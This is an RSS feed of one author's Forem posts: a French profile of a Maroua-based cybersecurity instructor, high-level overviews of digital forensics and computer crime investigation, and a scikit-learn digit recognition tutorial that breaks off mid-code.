<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0" xmlns:atom="http://www.w3.org/2005/Atom" xmlns:dc="http://purl.org/dc/elements/1.1/">
  <channel>
    <title>Forem: BEIDI DINA SAMUEL</title>
    <description>The latest articles on Forem by BEIDI DINA SAMUEL (@samglish).</description>
    <link>https://forem.com/samglish</link>
    <image>
      <url>https://media2.dev.to/dynamic/image/width=90,height=90,fit=cover,gravity=auto,format=auto/https:%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Fuser%2Fprofile_image%2F1482888%2F39c67aba-6953-4507-b3e6-d8c42092886f.jpg</url>
      <title>Forem: BEIDI DINA SAMUEL</title>
      <link>https://forem.com/samglish</link>
    </image>
    <atom:link rel="self" type="application/rss+xml" href="https://forem.com/feed/samglish"/>
    <language>en</language>
    <item>
      <title>BEIDI DINA SAMUEL : Le spécialiste qui Bâtit la Cybersécurité depuis Maroua</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Thu, 21 Aug 2025 22:08:14 +0000</pubDate>
      <link>https://forem.com/samglish/beidi-dina-samuel-le-specialiste-qui-batit-la-cybersecurite-depuis-maroua-4dfm</link>
      <guid>https://forem.com/samglish/beidi-dina-samuel-le-specialiste-qui-batit-la-cybersecurite-depuis-maroua-4dfm</guid>
      <description>&lt;p&gt;Dans le paysage technologique camerounais, où l'innovation est souvent concentrée dans les grandes métropoles, des figures émergent en démontrant que l'expertise n'a pas de frontières géographiques. Parmi elles, BEIDI DINA SAMUEL, un professionnel de l'informatique et de la cybersécurité basé à Maroua, se distingue par son parcours et son engagement envers sa communauté.&lt;/p&gt;

&lt;p&gt;Instructeur à l'École Nationale Supérieure Polytechnique de Maroua (ENSPM) et titulaire d'un master en ingénierie des réseaux et systèmes, BEIDI DINA SAMUEL a su transformer ses connaissances académiques en actions concrètes. Ses compétences couvrent des domaines critiques tels que le développement de logiciels web et mobiles, l'administration de systèmes et de réseaux, l'ingénierie AWS, et surtout, la cybersécurité.&lt;/p&gt;

&lt;p&gt;Son dévouement à la sécurité numérique s'est traduit par la création de la Cybersecurity Maroua Community (CMC). Cette initiative vise à fédérer les passionnés de cybersécurité de la région, à partager les connaissances et à renforcer les compétences locales dans un domaine en constante évolution. La CMC est un véritable hub d'apprentissage et de collaboration, prouvant qu'il est possible de créer des centres d'expertise en dehors des zones traditionnellement considérées comme technologiques.&lt;/p&gt;

&lt;p&gt;Sur des plateformes comme Medium et DEV Community, il partage activement son savoir-faire technique à travers des articles détaillés sur le piratage éthique, l'analyse des vulnérabilités ou encore l'investigation numérique. Il a également une présence notable sur GitHub où il présente des projets personnels, dont un mini-programme de traduction du français vers le fulfuldé, démontrant son habileté à développer des solutions pertinentes pour sa propre communauté.&lt;/p&gt;

&lt;p&gt;Par son travail d'instructeur, son engagement communautaire et ses contributions en ligne, BEIDI DINA SAMUEL s'impose comme une figure montante de la tech camerounaise. Il incarne une nouvelle génération de professionnels qui non seulement maîtrisent leur art, mais s'efforcent également de créer des opportunités et de démocratiser le savoir là où il est le plus nécessaire.&lt;/p&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9g44d1e3mjjjoxra90c.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fl9g44d1e3mjjjoxra90c.png" alt=" " width="800" height="1200"&gt;&lt;/a&gt;&lt;/p&gt;

</description>
      <category>cybersecurity</category>
      <category>opensource</category>
      <category>beididinasamuel</category>
      <category>machinelearning</category>
    </item>
    <item>
      <title>Computer Crime Investigation</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Fri, 13 Jun 2025 22:26:05 +0000</pubDate>
      <link>https://forem.com/samglish/computer-crime-investigation-56fd</link>
      <guid>https://forem.com/samglish/computer-crime-investigation-56fd</guid>
      <description>&lt;h3&gt;
  
  
  Introduction
&lt;/h3&gt;

&lt;p&gt;Computer crime investigation is a branch of digital forensics that aims to detect, analyze, preserve, and present digital evidence related to illegal activities carried out via or against computer systems.&lt;/p&gt;

&lt;h3&gt;
  
  
  Objectives of Digital Investigation
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Identify sources of digital evidence.&lt;/li&gt;
&lt;li&gt;Preserve the integrity of collected data.&lt;/li&gt;
&lt;li&gt;Reconstruct events that led to an attack.&lt;/li&gt;
&lt;li&gt;Identify the perpetrators or those responsible for malicious actions.&lt;/li&gt;
&lt;li&gt;Provide admissible evidence in a court of law.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Key Steps in the Investigation
&lt;/h3&gt;

&lt;ol&gt;
&lt;li&gt;Identification&lt;/li&gt;
&lt;li&gt;Detection of an incident or crime (e.g., intrusion, fraud, data theft).&lt;/li&gt;
&lt;li&gt;Defining the digital crime scene.&lt;/li&gt;
&lt;li&gt;Preservation&lt;/li&gt;
&lt;li&gt;Backing up systems, drives, and event logs.&lt;/li&gt;
&lt;li&gt;Using bit-by-bit imaging tools to avoid altering evidence.&lt;/li&gt;
&lt;li&gt;Collection&lt;/li&gt;
&lt;li&gt;Extracting files, emails, logs, metadata, etc.&lt;/li&gt;
&lt;li&gt;Maintaining the chain of custody.&lt;/li&gt;
&lt;li&gt;Analysis&lt;/li&gt;
&lt;li&gt;Examining data using specialized tools (e.g., EnCase, Autopsy, Volatility).&lt;/li&gt;
&lt;li&gt;Reconstructing activities: logins, transfers, deletions, etc.&lt;/li&gt;
&lt;li&gt;Presentation&lt;/li&gt;
&lt;li&gt;Writing a clear and chronological technical report.&lt;/li&gt;
&lt;li&gt;Legal use of evidence: expert testimony, submitting evidence in court.&lt;/li&gt;
&lt;/ol&gt;

&lt;h3&gt;
  
  
  Types of Computer Crimes Investigated
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Type of Crime&lt;/th&gt;
&lt;th&gt;Example&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Intrusion&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Unauthorized access to a server&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Fraud&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Phishing, bank fraud&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Espionage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Theft of confidential data&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Sabotage&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Data deletion or denial of service&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;strong&gt;Hacking&lt;/strong&gt;&lt;/td&gt;
&lt;td&gt;Deployment of malicious software (malware)&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;h3&gt;
  
  
  Tools and Methods Used
&lt;/h3&gt;

&lt;p&gt;&lt;strong&gt;Disk Analysis&lt;/strong&gt;: FTK Imager, Autopsy&lt;br&gt;&lt;br&gt;
&lt;strong&gt;RAM Analysis&lt;/strong&gt;: Volatility Framework&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Network Analysis&lt;/strong&gt;: Wireshark, tcpdump&lt;br&gt;&lt;br&gt;
&lt;strong&gt;Timeline and Correlation&lt;/strong&gt;: Plaso, SleuthKit&lt;/p&gt;

&lt;h3&gt;
  
  
  Legal Aspects
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Comply with local laws (e.g., GDPR, cybersecurity laws, Budapest Convention).&lt;/li&gt;
&lt;li&gt;Digital evidence must be &lt;strong&gt;authentic&lt;/strong&gt;, &lt;strong&gt;intact&lt;/strong&gt;, &lt;strong&gt;complete&lt;/strong&gt;, and &lt;strong&gt;explainable&lt;/strong&gt;.&lt;/li&gt;
&lt;/ul&gt;

&lt;h3&gt;
  
  
  Best Practices
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Always work on a &lt;strong&gt;copy&lt;/strong&gt; of the original data.&lt;/li&gt;
&lt;li&gt;
&lt;strong&gt;Document&lt;/strong&gt; every action (time, tool used, responsible person).&lt;/li&gt;
&lt;li&gt;Use &lt;strong&gt;certified tools&lt;/strong&gt; recognized by the forensic community.&lt;/li&gt;
&lt;/ul&gt;

</description>
      <category>cybersecurity</category>
      <category>beididinasamuel</category>
    </item>
    <item>
      <title>Investigation-Situation-Overview</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Sat, 07 Jun 2025 23:20:53 +0000</pubDate>
      <link>https://forem.com/samglish/investigation-situation-overview-mdb</link>
      <guid>https://forem.com/samglish/investigation-situation-overview-mdb</guid>
      <description>&lt;h3&gt;
  
  
  Forensics (or forensic analysis)
&lt;/h3&gt;

&lt;blockquote&gt;
&lt;p&gt;Forensics involves examining and analyzing computer systems after a security incident to collect digital evidence. The main objectives are to understand what happened, reconstruct the timeline of events, identify causes, and determine corrective actions.&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Methodology for evidence recovery&lt;/li&gt;
&lt;li&gt;Investigation processes&lt;/li&gt;
&lt;li&gt;Valid legal evidence&lt;/li&gt;
&lt;li&gt;Ethical considerations&lt;/li&gt;
&lt;li&gt;Techniques used by attackers&lt;/li&gt;
&lt;/ul&gt;
&lt;/blockquote&gt;

&lt;h3&gt;
  
  
  Statistics
&lt;/h3&gt;

&lt;p&gt;&lt;a href="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzriijwklaefdhqp0z08k.png" class="article-body-image-wrapper"&gt;&lt;img src="https://media2.dev.to/dynamic/image/width=800%2Cheight=%2Cfit=scale-down%2Cgravity=auto%2Cformat=auto/https%3A%2F%2Fdev-to-uploads.s3.amazonaws.com%2Fuploads%2Farticles%2Fzriijwklaefdhqp0z08k.png" alt=" " width="800" height="413"&gt;&lt;/a&gt;&lt;/p&gt;

&lt;h3&gt;
  
  
  Aspects of Organizational Security
&lt;/h3&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Aspect&lt;/th&gt;
&lt;th&gt;Examples&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;IT security&lt;/td&gt;
&lt;td&gt;Application, antivirus, networks&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Physical security&lt;/td&gt;
&lt;td&gt;Individuals, biometric security&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Financial security&lt;/td&gt;
&lt;td&gt;Fraud, botnets, phishing&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Legal security&lt;/td&gt;
&lt;td&gt;National security, copyright&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

</description>
      <category>investigation</category>
    </item>
    <item>
      <title>Investigation Report</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Fri, 06 Jun 2025 23:20:52 +0000</pubDate>
      <link>https://forem.com/samglish/investigation-report-ioi</link>
      <guid>https://forem.com/samglish/investigation-report-ioi</guid>
      <description>&lt;h1&gt;
  
  
  🕵️‍♂️ Summary: The Different Phases of Digital Investigation
&lt;/h1&gt;

&lt;p&gt;Digital investigation is a structured process aimed at &lt;strong&gt;retrieving, analyzing, and utilizing digital traces&lt;/strong&gt; following a security incident, fraud, or legal inquiry.&lt;/p&gt;




&lt;h2&gt;
  
  
  🔍 1. Identification
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Detect that an incident has occurred and identify potential sources of evidence.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key actions&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Monitoring system logs&lt;/li&gt;
&lt;li&gt;Security alerts (SIEM, IDS/IPS)&lt;/li&gt;
&lt;li&gt;User reports&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  📦 2. Preservation (or Acquisition)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Secure data without alteration to ensure evidence integrity.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Key actions&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Creating bit-by-bit disk images&lt;/li&gt;
&lt;li&gt;Using write blockers&lt;/li&gt;
&lt;li&gt;Maintaining chain of custody&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🧪 3. Analysis
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Deeply examine collected data to extract relevant information.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Types of analysis&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Log file review&lt;/li&gt;
&lt;li&gt;Malware or backdoor detection&lt;/li&gt;
&lt;li&gt;Metadata extraction&lt;/li&gt;
&lt;li&gt;Network traffic analysis (PCAP)&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🧾 4. Documentation
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Accurately record every step to ensure reproducibility and legal admissibility.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Best practices&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Timestamp all actions&lt;/li&gt;
&lt;li&gt;Take screenshots&lt;/li&gt;
&lt;li&gt;Write a structured report&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🧑‍⚖️ 5. Presentation
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Present the findings to decision-makers, investigators, or in court.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Possible formats&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Technical reports&lt;/li&gt;
&lt;li&gt;Visual summaries&lt;/li&gt;
&lt;li&gt;Expert testimony&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🛡️ 6. Bypassing / Active Response
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: In offensive or defensive contexts, understand how protections were bypassed.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Associated actions&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Analyzing rootkits or evasion techniques&lt;/li&gt;
&lt;li&gt;Reconstructing the attack vector&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🧭 7. Tracing Activities
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Identify past activity even if attempts were made to erase it.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Examples&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Recovering deleted files&lt;/li&gt;
&lt;li&gt;Reviewing login histories&lt;/li&gt;
&lt;li&gt;Restoring digital artifacts&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  🧱 8. Finding Hidden Traces
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objective&lt;/strong&gt;: Detect deliberately concealed evidence.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Techniques&lt;/strong&gt;:&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Steganography analysis&lt;/li&gt;
&lt;li&gt;Searching unallocated disk space&lt;/li&gt;
&lt;li&gt;Analyzing suspicious timestamps&lt;/li&gt;
&lt;/ul&gt;




&lt;blockquote&gt;
&lt;p&gt;✍️ &lt;strong&gt;Note&lt;/strong&gt;: Each step must be carried out with precision and traceability, especially in a judicial context.&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>cybersecurity</category>
      <category>beididinasamuel</category>
    </item>
    <item>
      <title>Rapports d'investigations</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Fri, 06 Jun 2025 23:13:20 +0000</pubDate>
      <link>https://forem.com/samglish/rapports-dinvestigations-1dbh</link>
      <guid>https://forem.com/samglish/rapports-dinvestigations-1dbh</guid>
      <description>&lt;ul&gt;
&lt;li&gt; Identifier et analyser les traces laissées lors de l'instruction dans un système informatique&lt;/li&gt;
&lt;li&gt;Collecter correctement les preuves nécessaires à des poursuites judiciaires&lt;/li&gt;
&lt;li&gt;Collecter et analyser des informations à des fins d'investigation&lt;/li&gt;
&lt;li&gt;Contourner les protections : pas uniquement de l'analyse finalement&lt;/li&gt;
&lt;li&gt;Suivi (tracking)&lt;/li&gt;
&lt;li&gt;Retrouver les traces : personnes ou journaux&lt;/li&gt;
&lt;li&gt;Trouver les traces cachées&lt;/li&gt;
&lt;/ul&gt;

&lt;h1&gt;
  
  
  Résumé : Les différentes parties de l'investigation numérique
&lt;/h1&gt;

&lt;p&gt;L'investigation numérique est un processus structuré qui permet de &lt;strong&gt;retrouver, analyser et exploiter des traces numériques&lt;/strong&gt; dans le cadre d’un incident de sécurité, d’une fraude, ou d’une enquête judiciaire.&lt;/p&gt;




&lt;h2&gt;
  
  
  1. Identification
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objectif&lt;/strong&gt; : Détecter qu’un incident s’est produit et identifier les sources potentielles de preuves.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Actions clés&lt;/strong&gt; :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Surveillance des journaux systèmes&lt;/li&gt;
&lt;li&gt;Alertes de sécurité (SIEM, IDS/IPS)&lt;/li&gt;
&lt;li&gt;Rapports d’utilisateurs&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  2. Préservation (ou acquisition)
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objectif&lt;/strong&gt; : Sauvegarder les données sans les altérer, pour garantir leur intégrité.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Actions clés&lt;/strong&gt; :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Création d’images disques (bit à bit)&lt;/li&gt;
&lt;li&gt;Blocage de l’écriture (write blocker)&lt;/li&gt;
&lt;li&gt;Chaîne de traçabilité (chain of custody)&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  3. Analyse
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objectif&lt;/strong&gt; : Examiner en profondeur les données collectées pour extraire les éléments pertinents.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Types d’analyse&lt;/strong&gt; :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Analyse des fichiers journaux (logs)&lt;/li&gt;
&lt;li&gt;Recherche de malwares ou de backdoors&lt;/li&gt;
&lt;li&gt;Extraction de métadonnées&lt;/li&gt;
&lt;li&gt;Analyse réseau (PCAP)&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  4. Documentation
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objectif&lt;/strong&gt; : Noter précisément chaque étape pour assurer la reproductibilité et la validité judiciaire.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Bonnes pratiques&lt;/strong&gt; :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Horodatage de chaque action&lt;/li&gt;
&lt;li&gt;Captures d’écran&lt;/li&gt;
&lt;li&gt;Rapport structuré&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  5. Présentation
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objectif&lt;/strong&gt; : Présenter les résultats de l’analyse à des décideurs, enquêteurs ou en justice.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Supports possibles&lt;/strong&gt; :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Rapports techniques&lt;/li&gt;
&lt;li&gt;Synthèses visuelles&lt;/li&gt;
&lt;li&gt;Témoignage en cour&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  6. Contournement / Réponse active
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objectif&lt;/strong&gt; : Dans certains contextes offensifs ou défensifs, il faut aussi comprendre comment les protections ont été contournées.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Actions associées&lt;/strong&gt; :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Analyse de rootkits ou techniques d’évasion&lt;/li&gt;
&lt;li&gt;Reconstruction des vecteurs d’attaque&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  7. Retrouver les traces
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objectif&lt;/strong&gt; : Identifier les activités passées malgré des tentatives de suppression.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Exemples&lt;/strong&gt; :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Récupération de fichiers supprimés&lt;/li&gt;
&lt;li&gt;Historique des connexions&lt;/li&gt;
&lt;li&gt;Restauration d’artefacts&lt;/li&gt;
&lt;/ul&gt;




&lt;h2&gt;
  
  
  8. Recherche des traces cachées
&lt;/h2&gt;

&lt;p&gt;&lt;strong&gt;Objectif&lt;/strong&gt; : Détecter des preuves dissimulées volontairement.&lt;/p&gt;

&lt;p&gt;&lt;strong&gt;Techniques&lt;/strong&gt; :&lt;/p&gt;

&lt;ul&gt;
&lt;li&gt;Analyse de stéganographie&lt;/li&gt;
&lt;li&gt;Recherche dans les espaces non alloués&lt;/li&gt;
&lt;li&gt;Analyse des time stamps anormaux&lt;/li&gt;
&lt;/ul&gt;




&lt;blockquote&gt;
&lt;p&gt;&lt;strong&gt;Note&lt;/strong&gt; : Chaque étape doit être menée avec rigueur et traçabilité, notamment dans un cadre judiciaire.&lt;/p&gt;
&lt;/blockquote&gt;

</description>
      <category>investigation</category>
      <category>beididinasamuel</category>
      <category>cybersecurity</category>
    </item>
    <item>
      <title>Handwritten digit recognition with scikit-learn</title>
      <dc:creator>BEIDI DINA SAMUEL</dc:creator>
      <pubDate>Tue, 28 Jan 2025 17:45:13 +0000</pubDate>
      <link>https://forem.com/samglish/handwritten-digit-recognition-with-scikit-learn-38bf</link>
      <guid>https://forem.com/samglish/handwritten-digit-recognition-with-scikit-learn-38bf</guid>
      <description>&lt;h1&gt;
  
  
  &lt;code&gt;scikit-learn&lt;/code&gt;
&lt;/h1&gt;

&lt;p&gt;Handwritten digit recognition with scikit-learn&lt;br&gt;
&lt;/p&gt;

&lt;h3&gt;
  
  
  &lt;code&gt;Installing scikit-learn&lt;/code&gt;
&lt;/h3&gt;

&lt;ul&gt;
&lt;li&gt;Use pip virtualenv
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;pip&lt;/span&gt; &lt;span class="n"&gt;install&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;U&lt;/span&gt; &lt;span class="n"&gt;scikit&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;learn&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;ul&gt;
&lt;li&gt;Use conda 
&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="n"&gt;conda&lt;/span&gt; &lt;span class="n"&gt;create&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;n&lt;/span&gt; &lt;span class="n"&gt;sklearn&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;env&lt;/span&gt; &lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;c&lt;/span&gt; &lt;span class="n"&gt;conda&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;forge&lt;/span&gt; &lt;span class="n"&gt;scikit&lt;/span&gt;&lt;span class="o"&gt;-&lt;/span&gt;&lt;span class="n"&gt;learn&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight plaintext"&gt;&lt;code&gt;conda activate sklearn-env
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;


&lt;p&gt;see the documentation for more information &lt;a href="https://scikit-learn.org/stable/install.html" rel="noopener noreferrer"&gt;&lt;/a&gt;&lt;a href="https://scikit-learn.org/stable/install.html" rel="noopener noreferrer"&gt;https://scikit-learn.org/stable/install.html&lt;/a&gt;&lt;br&gt;
&lt;/p&gt;

&lt;h3&gt;
  
  
  We trained a simple neural network to recognize the numbers in these images. This network will take 1D arrays of 8x8=64 values as input. We then converted these 2D images into 1D arrays
&lt;/h3&gt;




&lt;p&gt;We start by loading the sample&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="kn"&gt;from&lt;/span&gt; &lt;span class="n"&gt;sklearn&lt;/span&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;datasets&lt;/span&gt;
&lt;span class="n"&gt;digits&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="n"&gt;datasets&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;load_digits&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Then we print the first image&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt;&lt;span class="nf"&gt;print&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;digits&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;images&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight console"&gt;&lt;code&gt;&lt;span class="go"&gt;[[ 0.  0.  5. 13.  9.  1.  0.  0.]
 [ 0.  0. 13. 15. 10. 15.  5.  0.]
 [ 0.  3. 15.  2.  0. 11.  8.  0.]
 [ 0.  4. 12.  0.  0.  8.  8.  0.]
 [ 0.  5.  8.  0.  0.  9.  8.  0.]
 [ 0.  4. 11.  0.  1. 12.  7.  0.]
 [ 0.  2. 14.  5. 10. 12.  0.  0.]
 [ 0.  0.  6. 13. 10.  0.  0.  0.]]
&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;Like all the images in the sample, this one is an 8x8 pixel image, black and white (a single color level per pixel). It can be displayed in the following way, also indicating the corresponding label (the number to which the image corresponds)&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight python"&gt;&lt;code&gt; &lt;span class="kn"&gt;import&lt;/span&gt; &lt;span class="n"&gt;matplotlib.pyplot&lt;/span&gt; &lt;span class="k"&gt;as&lt;/span&gt; &lt;span class="n"&gt;plt&lt;/span&gt;
&lt;span class="n"&gt;plt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;imshow&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;digits&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;images&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;],&lt;/span&gt;&lt;span class="n"&gt;cmap&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="s"&gt;binary&lt;/span&gt;&lt;span class="sh"&gt;'&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt;
&lt;span class="n"&gt;plt&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;title&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="n"&gt;digits&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="n"&gt;target&lt;/span&gt;&lt;span class="p"&gt;[&lt;/span&gt;&lt;span class="mi"&gt;0&lt;/span&gt;&lt;span class="p"&gt;])&lt;/span&gt;
